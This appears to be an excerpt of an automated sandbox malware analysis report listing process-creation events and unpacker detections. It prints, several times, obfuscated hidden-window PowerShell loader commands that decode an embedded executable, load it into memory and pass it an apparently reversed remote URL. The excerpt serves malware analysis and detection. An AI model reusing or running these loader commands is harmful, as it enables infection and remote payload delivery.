Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?

.NET source code contains potential unpacker

Source: 22.0.RegSvcs.exe.400000.1.unpack, Program.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.0.RegSvcs.exe.400000.3.unpack, Program.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.0.RegSvcs.exe.400000.2.unpack, Program.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.2.RegSvcs.exe.400000.0.unpack, Program.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.0.RegSvcs.exe.400000.0.unpack, Program.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.0.RegSvcs.exe.400000.4.unpack, Program.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Obfuscated command line found

